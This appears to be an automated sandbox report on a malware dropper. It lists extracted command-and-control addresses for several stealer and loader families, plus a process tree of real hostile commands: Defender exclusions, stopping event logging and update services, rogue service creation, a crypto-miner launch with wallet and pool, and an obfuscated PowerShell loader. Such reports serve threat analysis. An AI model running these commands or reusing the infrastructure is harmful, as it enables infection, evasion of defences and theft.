Resubmissions

18-09-2024 16:12

240918-tnhy5a1cmp 10

16-08-2024 04:34

240816-e7ba3azckk 10

16-08-2024 04:25

240816-e14zssyhpq 10

16-08-2024 04:25

240816-e1x69ayhpk 3

15-08-2024 21:56

240815-1tbkka1fpq 10

15-08-2024 21:47

240815-1nkw2swfre 10

15-08-2024 21:46

240815-1m318s1cpr 3

15-08-2024 21:46

240815-1mkvnawflb 10

13-08-2024 22:28

240813-2dvtyazbph 10

25-06-2024 11:24

240625-nhwp5swhja 10

Analysis

  • max time kernel
    134s
  • max time network
    1801s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    24-06-2024 00:56

General

  • Target

    New Text Document mod.exe

  • Size

    8KB

  • MD5

    69994ff2f00eeca9335ccd502198e05b

  • SHA1

    b13a15a5bea65b711b835ce8eccd2a699a99cead

  • SHA256

    2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2

  • SHA512

    ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3

  • SSDEEP

    96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Malware Config

Extracted

Family

amadey

Version

4.31

Botnet

c43c2d

C2

http://o7labs.top

Attributes
  • install_dir

    28feeece5c

  • install_file

    Hkbsse.exe

  • strings_key

    db4823e211dffb31faf4fc1fd90d3289

  • url_paths

    /online/support/index.php

rc4.plain

Extracted

Family

redline

Botnet

AMA

C2

185.215.113.67:40960

Extracted

Family

loaderbot

C2

https://cv99160.tw1.ru/cmd.php

Extracted

Family

risepro

C2

77.91.77.66:58709

Extracted

Family

lumma

C2

https://disappointcredisotw.shop/api

https://publicitycharetew.shop/api

https://computerexcudesp.shop/api

https://leafcalfconflcitw.shop/api

https://injurypiggyoewirog.shop/api

https://bargainnygroandjwk.shop/api

https://doughtdrillyksow.shop/api

https://facilitycoursedw.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Gh0st RAT payload 7 IoCs
  • Gh0strat

    Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.

  • LoaderBot

    LoaderBot is a loader written in .NET downloading and executing miners.

  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 2 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • LoaderBot executable 2 IoCs
  • XMRig Miner payload 13 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 27 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 5 IoCs

    Detects Themida, an advanced Windows software protection system.

  • UPX packed file 22 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 22 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Power Settings 1 TTPs 15 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 17 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 53 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
    "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:612
    • C:\Users\Admin\AppData\Local\Temp\a\0x3fg.exe
      "C:\Users\Admin\AppData\Local\Temp\a\0x3fg.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in Windows directory
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:4440
      • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
        "C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:1660
        • C:\Users\Admin\AppData\Roaming\1000001000\uYtF.exe
          "C:\Users\Admin\AppData\Roaming\1000001000\uYtF.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:1636
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            5⤵
            • Power Settings
            • Suspicious use of AdjustPrivilegeToken
            PID:2900
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
            5⤵
            • Power Settings
            • Suspicious use of AdjustPrivilegeToken
            PID:1580
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            5⤵
            • Power Settings
            • Suspicious use of AdjustPrivilegeToken
            PID:164
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
            5⤵
            • Power Settings
            • Suspicious use of AdjustPrivilegeToken
            PID:1444
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe delete "xjuumoinznsp"
            5⤵
            • Launches sc.exe
            PID:1204
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe create "xjuumoinznsp" binpath= "C:\ProgramData\ajdiewdhnaew\wfbrmcwrltkl.exe" start= "auto"
            5⤵
            • Launches sc.exe
            PID:4464
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop eventlog
            5⤵
            • Launches sc.exe
            PID:3000
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe start "xjuumoinznsp"
            5⤵
            • Launches sc.exe
            PID:2692
    • C:\Users\Admin\AppData\Local\Temp\a\setup.exe
      "C:\Users\Admin\AppData\Local\Temp\a\setup.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4308
      • C:\Users\Admin\AppData\Local\Temp\setup-1fbfaf8ef9c1de1d\setup.exe
        "C:\Users\Admin\AppData\Local\Temp\setup-1fbfaf8ef9c1de1d\setup.exe"
        3⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious use of WriteProcessMemory
        PID:4236
        • C:\Windows\system32\winsvc.exe
          "C:\Windows\system32\winsvc.exe" "C:\Users\Admin\AppData\Local\Temp\setup-1fbfaf8ef9c1de1d\setup.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2540
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "create" "winsvc" "type=own" "start=auto" "error=ignore" "binPath=\"C:\Windows\system32\winsvc.exe\"" "DisplayName=\"Windows System Service\""
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of AdjustPrivilegeToken
            PID:3720
            • C:\Windows\system32\sc.exe
              "C:\Windows\system32\sc.exe" create winsvc type=own start=auto error=ignore binPath=C:\Windows\system32\winsvc.exe "DisplayName=Windows System Service"
              6⤵
              • Launches sc.exe
              PID:4188
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "failure" "winsvc" "reset=0" "actions=restart/0/restart/0/restart/0"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of AdjustPrivilegeToken
            PID:2408
            • C:\Windows\system32\sc.exe
              "C:\Windows\system32\sc.exe" failure winsvc reset=0 actions=restart/0/restart/0/restart/0
              6⤵
              • Launches sc.exe
              PID:7772
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "description" "winsvc" "\"Windows System Service is the main system supervision service.\""
            5⤵
            • Command and Scripting Interpreter: PowerShell
            PID:7852
            • C:\Windows\system32\sc.exe
              "C:\Windows\system32\sc.exe" description winsvc "Windows System Service is the main system supervision service."
              6⤵
              • Launches sc.exe
              PID:10344
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "start" "winsvc"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            PID:9184
            • C:\Windows\system32\sc.exe
              "C:\Windows\system32\sc.exe" start winsvc
              6⤵
              • Launches sc.exe
              PID:5228
    • C:\Users\Admin\AppData\Local\Temp\a\taskweaker.exe
      "C:\Users\Admin\AppData\Local\Temp\a\taskweaker.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:4684
      • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        3⤵
          PID:5044
      • C:\Users\Admin\AppData\Local\Temp\a\ama.exe
        "C:\Users\Admin\AppData\Local\Temp\a\ama.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1144
        • C:\Users\Admin\AppData\Local\Temp\6.exe
          "C:\Users\Admin\AppData\Local\Temp\6.exe"
          3⤵
            PID:6464
        • C:\Users\Admin\AppData\Local\Temp\a\setup222.exe
          "C:\Users\Admin\AppData\Local\Temp\a\setup222.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4756
          • C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe
            SetupWizard.exe
            3⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:3076
            • C:\Users\Admin\AppData\Local\Temp\SetupWizard-66b0c80010508c0a\SetupWizard.exe
              "C:\Users\Admin\AppData\Local\Temp\SetupWizard-66b0c80010508c0a\SetupWizard.exe"
              4⤵
              • Executes dropped EXE
              PID:3604
          • C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe
            SetupWizard.exe
            3⤵
              PID:4064
              • C:\Users\Admin\AppData\Local\Temp\SetupWizard-a590790cbb75dfa6\SetupWizard.exe
                "C:\Users\Admin\AppData\Local\Temp\SetupWizard-a590790cbb75dfa6\SetupWizard.exe"
                4⤵
                  PID:11352
              • C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe
                SetupWizard.exe
                3⤵
                  PID:6452
                  • C:\Users\Admin\AppData\Local\Temp\SetupWizard-91ec399e47b4bf68\SetupWizard.exe
                    "C:\Users\Admin\AppData\Local\Temp\SetupWizard-91ec399e47b4bf68\SetupWizard.exe"
                    4⤵
                      PID:8100
                  • C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe
                    SetupWizard.exe
                    3⤵
                      PID:2924
                      • C:\Users\Admin\AppData\Local\Temp\SetupWizard-af7116e961952287\SetupWizard.exe
                        "C:\Users\Admin\AppData\Local\Temp\SetupWizard-af7116e961952287\SetupWizard.exe"
                        4⤵
                          PID:10984
                      • C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe
                        SetupWizard.exe
                        3⤵
                          PID:9060
                          • C:\Users\Admin\AppData\Local\Temp\SetupWizard-bb982e11ca6a2191\SetupWizard.exe
                            "C:\Users\Admin\AppData\Local\Temp\SetupWizard-bb982e11ca6a2191\SetupWizard.exe"
                            4⤵
                              PID:12048
                          • C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe
                            SetupWizard.exe
                            3⤵
                              PID:3552
                              • C:\Users\Admin\AppData\Local\Temp\SetupWizard-45815dea70755b24\SetupWizard.exe
                                "C:\Users\Admin\AppData\Local\Temp\SetupWizard-45815dea70755b24\SetupWizard.exe"
                                4⤵
                                  PID:12464
                              • C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe
                                SetupWizard.exe
                                3⤵
                                  PID:3400
                                  • C:\Users\Admin\AppData\Local\Temp\SetupWizard-066aacd0a331ff1e\SetupWizard.exe
                                    "C:\Users\Admin\AppData\Local\Temp\SetupWizard-066aacd0a331ff1e\SetupWizard.exe"
                                    4⤵
                                      PID:8448
                                • C:\Users\Admin\AppData\Local\Temp\a\FirstZ.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\FirstZ.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:2884
                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                    3⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4944
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                    3⤵
                                      PID:8604
                                      • C:\Windows\system32\wusa.exe
                                        wusa /uninstall /kb:890830 /quiet /norestart
                                        4⤵
                                          PID:10064
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop UsoSvc
                                        3⤵
                                        • Launches sc.exe
                                        PID:8592
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                        3⤵
                                        • Launches sc.exe
                                        PID:8280
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop wuauserv
                                        3⤵
                                        • Launches sc.exe
                                        PID:8760
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop bits
                                        3⤵
                                        • Launches sc.exe
                                        PID:9980
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop dosvc
                                        3⤵
                                        • Launches sc.exe
                                        PID:9192
                                      • C:\Windows\system32\powercfg.exe
                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                        3⤵
                                        • Power Settings
                                        PID:9268
                                      • C:\Windows\system32\powercfg.exe
                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                        3⤵
                                        • Power Settings
                                        PID:8876
                                      • C:\Windows\system32\powercfg.exe
                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                        3⤵
                                        • Power Settings
                                        PID:9504
                                      • C:\Windows\system32\powercfg.exe
                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                        3⤵
                                        • Power Settings
                                        PID:8540
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe delete "WSNKISKT"
                                        3⤵
                                        • Launches sc.exe
                                        PID:5760
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
                                        3⤵
                                        • Launches sc.exe
                                        PID:7608
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop eventlog
                                        3⤵
                                        • Launches sc.exe
                                        PID:5300
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe start "WSNKISKT"
                                        3⤵
                                        • Launches sc.exe
                                        PID:5288
                                    • C:\Users\Admin\AppData\Local\Temp\a\pic1.exe
                                      "C:\Users\Admin\AppData\Local\Temp\a\pic1.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of WriteProcessMemory
                                      PID:232
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
                                        3⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:944
                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\rolex.exe
                                          rolex.exe -priverdD
                                          4⤵
                                          • Executes dropped EXE
                                          • Suspicious use of WriteProcessMemory
                                          PID:1832
                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\yondex.exe
                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\yondex.exe"
                                            5⤵
                                            • Drops startup file
                                            • Executes dropped EXE
                                            • Adds Run key to start application
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            • Suspicious use of WriteProcessMemory
                                            PID:2568
                                            • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                              "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3008
                                            • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                              "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
                                              6⤵
                                                PID:15992
                                      • C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
                                        "C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Drops file in Program Files directory
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of WriteProcessMemory
                                        PID:4192
                                        • C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
                                          "C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:888
                                      • C:\Users\Admin\AppData\Local\Temp\a\pic15.exe
                                        "C:\Users\Admin\AppData\Local\Temp\a\pic15.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:2644
                                        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          3⤵
                                            PID:8616
                                        • C:\Users\Admin\AppData\Local\Temp\a\limba.exe
                                          "C:\Users\Admin\AppData\Local\Temp\a\limba.exe"
                                          2⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Checks whether UAC is enabled
                                          PID:1824
                                        • C:\Users\Admin\AppData\Local\Temp\a\ChatLife.exe
                                          "C:\Users\Admin\AppData\Local\Temp\a\ChatLife.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          PID:1508
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c copy Confirmed Confirmed.cmd & Confirmed.cmd
                                            3⤵
                                              PID:4528
                                          • C:\Users\Admin\AppData\Local\Temp\a\1.exe
                                            "C:\Users\Admin\AppData\Local\Temp\a\1.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Checks SCSI registry key(s)
                                            PID:4464
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 492
                                              3⤵
                                              • Program crash
                                              PID:4744
                                          • C:\Users\Admin\AppData\Local\Temp\a\gui.exe
                                            "C:\Users\Admin\AppData\Local\Temp\a\gui.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:4440
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "powershell.exe" -windowstyle hidden "$Uhyggestemninger=Get-Content 'C:\Users\Admin\AppData\Local\Kbmandslivenes110\jesuitical\colourama\Blaze.Udk';$Unyieldingly=$Uhyggestemninger.SubString(54584,3);.$Unyieldingly($Uhyggestemninger)"
                                              3⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1072
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
                                                4⤵
                                                  PID:1448
                                          • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                            C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                            1⤵
                                            • Executes dropped EXE
                                            PID:2280
                                          • C:\ProgramData\ajdiewdhnaew\wfbrmcwrltkl.exe
                                            C:\ProgramData\ajdiewdhnaew\wfbrmcwrltkl.exe
                                            1⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of WriteProcessMemory
                                            PID:3716
                                            • C:\Windows\system32\powercfg.exe
                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                              2⤵
                                              • Power Settings
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:808
                                            • C:\Windows\system32\powercfg.exe
                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                              2⤵
                                              • Power Settings
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2952
                                            • C:\Windows\system32\powercfg.exe
                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                              2⤵
                                              • Power Settings
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4596
                                            • C:\Windows\system32\powercfg.exe
                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                              2⤵
                                              • Power Settings
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3612
                                            • C:\Windows\explorer.exe
                                              explorer.exe
                                              2⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:668
                                          • C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
                                            "C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
                                            1⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            • Suspicious use of WriteProcessMemory
                                            PID:1732
                                            • C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
                                              "C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Enumerates connected drives
                                              • Checks processor information in registry
                                              • Modifies data under HKEY_USERS
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2424
                                          • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                            C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                            1⤵
                                              PID:7692
                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                              1⤵
                                                PID:10216
                                              • C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                1⤵
                                                  PID:7584
                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                    2⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    PID:6256
                                                • C:\Windows\system32\winsvc.exe
                                                  C:\Windows\system32\winsvc.exe
                                                  1⤵
                                                    PID:5332
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\system32\""
                                                      2⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:11148
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\Temp\""
                                                      2⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:10592
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-SETACTIVE" "8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c"
                                                      2⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:1792
                                                      • C:\Windows\system32\powercfg.exe
                                                        "C:\Windows\system32\powercfg.exe" -SETACTIVE 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c
                                                        3⤵
                                                        • Power Settings
                                                        PID:1220
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "standby-timeout-ac" "0"
                                                      2⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:12160
                                                      • C:\Windows\system32\powercfg.exe
                                                        "C:\Windows\system32\powercfg.exe" -change standby-timeout-ac 0
                                                        3⤵
                                                        • Power Settings
                                                        PID:5420
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "standby-timeout-dc" "0"
                                                      2⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:11652
                                                      • C:\Windows\system32\powercfg.exe
                                                        "C:\Windows\system32\powercfg.exe" -change standby-timeout-dc 0
                                                        3⤵
                                                        • Power Settings
                                                        PID:4000
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "hibernate-timeout-ac" "0"
                                                      2⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:4676
                                                  • C:\Windows\system32\browser_broker.exe
                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                    1⤵
                                                      PID:6728
                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                      1⤵
                                                        PID:11232
                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                        1⤵
                                                          PID:6328
                                                        • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                          C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                          1⤵
                                                            PID:5524
                                                          • C:\Windows\system32\werfault.exe
                                                            werfault.exe /h /shared Global\79679cef34ec432a8d273fa4a6dfd81f /t 5540 /p 11232
                                                            1⤵
                                                              PID:7540
                                                            • C:\Windows\system32\werfault.exe
                                                              werfault.exe /h /shared Global\0e4798b19e104374ab8ef36155f4f152 /t 5272 /p 6328
                                                              1⤵
                                                                PID:6776
                                                              • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                1⤵
                                                                  PID:7736
                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
